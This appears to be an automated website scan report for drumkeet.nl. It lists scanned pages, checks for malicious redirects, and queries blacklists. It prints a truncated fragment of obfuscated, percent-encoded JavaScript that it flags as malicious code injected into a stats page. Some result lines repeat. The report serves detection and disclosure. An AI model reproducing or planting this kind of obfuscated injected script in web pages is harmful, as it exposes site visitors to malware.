Scanned pages/files
Request | Server response | Status |
http://drumkeet.nl/stats/usage_200603.html | 200 OK Content-Length: 116795 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jwYWDZiBkO='';function YIh(lkePU){ alert('lRexX');var VKjwOjJnkB=new Function("RPqOHITN", "return 647782;"); } var jVQ='';var yLB=false;var bCGP="bCGP";var qMU='';var ePV;var kMV="";var sEE="sEE";ePV='%db%cf%d5%c1%ce%db%d7%c8%f5%b3%e8%a8%92%b6%ba%d2%8b%93%93%b7%fd%85%80%82%97%c3%9f%8e%91%9f%e4%b8%90%b2%bb%99%8a%9e%83%b4%bc%c3%d2%ce%c7%dd%c0%dc%8d%81%d5%b0%a8%d2%bc%ce%8a%cd%96%85%91%ec%84%97%86%c5%da%ee%ba%aa%d4%e2%d8%e4%c9%dd%c8%f4%cf%fc%b5%bb%89%98%9b%de%93%cf%c3%84%d7%ee%ff%84%91%89%8b%89%93%e Antivirus reports:
| ||
http://drumkeet.nl/stats/ | 200 OK Content-Length: 10103 Content-Type: text/html | clean |
http://drumkeet.nl/stats/usage_201011.html | 200 OK Content-Length: 111327 Content-Type: text/html | clean |
http://drumkeet.nl/ | 200 OK Content-Length: 13921 Content-Type: text/html | clean |
http://drumkeet.nl/page2.php | 200 OK Content-Length: 13921 Content-Type: text/html | clean |
http://drumkeet.nl/page3.php | 200 OK Content-Length: 14357 Content-Type: text/html | clean |
http://drumkeet.nl/page5.php | 200 OK Content-Length: 11144 Content-Type: text/html | clean |
http://drumkeet.nl/page4.php | 200 OK Content-Length: 14471 Content-Type: text/html | clean |
http://drumkeet.nl/page1.php | 200 OK Content-Length: 33593 Content-Type: text/html | clean |
http://drumkeet.nl/page2.php?SessionID=dbfc2f254cb70ef0ce6b | 200 OK Content-Length: 13921 Content-Type: text/html | clean |
http://drumkeet.nl/page15.php | 200 OK Content-Length: 12847 Content-Type: text/html | clean |
http://drumkeet.nl/page6.php | 200 OK Content-Length: 11383 Content-Type: text/html | clean |
http://drumkeet.nl/page16.php | 200 OK Content-Length: 11841 Content-Type: text/html | clean |
http://drumkeet.nl/page17.php | 200 OK Content-Length: 10628 Content-Type: text/html | clean |
http://drumkeet.nl/page18.php | 200 OK Content-Length: 10774 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: drumkeet.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 11:54:21 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: drumkeet.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 11:54:21 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: drumkeet.nl
Referer: http://www.google.com/search?q=drumkeet.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: drumkeet.nl
Referer: http://www.google.com/search?q=drumkeet.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=drumkeet.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://drumkeet.nl/
Result: drumkeet.nl is not infected or malware details are not published yet.
Result: drumkeet.nl is not infected or malware details are not published yet.